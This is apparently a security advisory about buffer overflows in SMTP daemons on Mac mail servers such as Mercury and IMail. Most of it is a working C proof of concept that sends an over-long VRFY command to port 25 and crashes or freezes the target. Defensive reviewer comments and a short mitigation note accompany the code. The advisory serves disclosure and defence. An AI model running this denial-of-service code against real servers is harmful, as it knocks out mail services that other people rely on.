COMMAND

    smtp overflows

SYSTEMS AFFECTED

    Mac

PROBLEM

    Jon Beaton posted the following.  There have been more advisories
    about buffer overflows in SMTP daemons, so here is another one.
    After posting about these attacks on SLMail and IMail, Jon found
    that a lot more daemons were still affected.  On the few he tried
    on the Mac, such as Mercury, it locked the server up, much like
    AppleShare.  The listing below is just mdaemon.c with a few tiny
    changes: it sends a single SMTP VRFY command whose argument is 896
    characters long.  It will also crash IMail, even though the author
    has said it wasn't affected.

    /*
    mdaemon.c with a few small changes.
    known to lock up the whole server with some daemons on the Mac
  
    Cisc0 @ Undernet
    */

    #include <stdio.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <string.h>
    #include <stdlib.h>
    #include <unistd.h>

     /*
      * Reproduction case for the advisory above: resolve the host named in
      * argv[1], open a TCP connection to port 25, send one over-long SMTP
      * VRFY line, and disconnect.
      *
      * Reviewer notes (defensive reading):
      *  - The line sent is "VRFY " + 896 x 'd' + CRLF = 903 bytes.  RFC 821
      *    limits an SMTP command line to 512 characters including CRLF, so a
      *    server or filter enforcing that limit rejects this input before any
      *    argument parsing; command lines over 512 bytes are also a simple
      *    thing to log and alert on.
      *  - The failure in the affected daemons is presumably a copy of the
      *    VRFY argument into a fixed-size buffer without a length check; the
      *    advisory does not show the server side, so confirm per product.
      *  - The return values of socket(), connect(), malloc() and write() are
      *    never checked, and the server's greeting/reply is never read.
      *  - "void main" is non-standard; the program reports no exit status on
      *    the normal path.
      */
     void main(int argc, char *argv[])
     {
       struct sockaddr_in sin;
       struct hostent *hp;
       char *buffer;
       int sock, i;

       /* Exactly one argument is expected: the SMTP server's host name. */
       if (argc != 2) {
         printf("usage: %s <smtp server>\n", argv[0]);
         exit(1);
       }
       hp = gethostbyname(argv[1]);
       if (hp==NULL) {
         printf("Unknown host: %s\n",argv[1]);
         exit(1);
       }
       bzero((char*) &sin, sizeof(sin));
       /* NOTE(review): copies hp->h_length bytes with no check against
          sizeof(sin.sin_addr); the code relies on the resolver returning
          an address that fits. */
       bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
       sin.sin_family = hp->h_addrtype;
       sin.sin_port = htons(25);   /* SMTP */
       sock = socket(AF_INET, SOCK_STREAM, 0);
       /* Result not checked: a failed connect falls through to write(). */
       connect(sock,(struct sockaddr *) &sin, sizeof(sin));
       /* 1000 bytes holds the 903-byte line plus its terminating NUL;
          the allocation result is not checked before use. */
       buffer = (char *)malloc(1000);
       sprintf(buffer, "VRFY ");
       /* Build the 896-character VRFY argument one byte at a time. */
       for (i = 0; i<896; i++)
         strcat(buffer, "d");
       strcat(buffer, "\r\n");
       /* Single write of the whole command line; no reply is read back. */
       write(sock, &buffer[0], strlen(buffer));
       close(sock);
       free(buffer);
    }

SOLUTION

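    Next releases will hopefully fix this.  No workaround is given here;
    since the listing's trigger is an over-long VRFY argument, disabling
    VRFY or capping SMTP command-line length in front of the daemon,
    where that is possible, limits exposure until a fix ships.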